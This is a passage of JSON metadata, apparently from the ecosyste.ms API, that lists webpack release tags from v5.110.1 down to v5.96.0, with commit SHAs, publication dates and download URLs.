k/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.m